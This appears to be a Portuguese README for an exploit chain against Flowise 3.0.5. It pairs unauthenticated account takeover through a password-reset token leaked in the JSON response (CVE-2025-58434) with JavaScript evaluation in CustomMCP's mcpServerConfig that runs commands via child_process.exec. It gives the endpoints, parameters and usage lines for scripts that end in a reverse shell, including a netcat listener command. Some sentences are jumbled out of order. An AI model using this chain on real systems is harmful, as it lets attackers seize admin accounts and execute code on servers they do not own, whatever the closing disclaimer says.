
Cadeia de exploração para Flowise 3.0.5: tomada de conta não autenticada via divulgação de token de redefinição de senha (CVE-2025-58434) encadeada com avaliação de JavaScript CustomMCP para execução remota de código.
Dois problemas no Flowise 3.0.5, encadeados:
POST /api/v1/account/forgot-password retorna o tempToken do usuário-alvo
diretamente na resposta JSON. Envie-o para POST /api/v1/account/reset-password
para definir uma senha conhecida para qualquer conta, incluindo o primeiro admin -> assunção
total de conta não autenticada.mcpServerConfig do CustomMCP.
Com uma sessão e chave de API do workspace (do passo 1),
POST /api/v1/node-load-method/customMCP com loadMethod=listActions
avalia a string mcpServerConfig como JavaScript no processo do Flowise,
permitindo RCE via . (Problema separado do Flowise
usado aqui apenas para transformar a ATO em execução de código; nenhum CVE atribuído no
momento da escrita.)require('child_process').exec()CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - cadeia completa (ATO -> chave de API -> reverse shell via CustomMCP)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# tenha `nc -lvnp <LPORT>` pronto
flowise_customMCP_rce.py - apenas RCE via CustomMCP (requer uma chave de API)python3 flowise_customMCP_rce.py '<comando>' '<FLOWISE_API_KEY>'
Apenas para testes de segurança autorizados e fins educacionais. Execute isso somente contra sistemas que você possui ou para os quais tem permissão explícita por escrito para testar.
Autor: r3vpwnx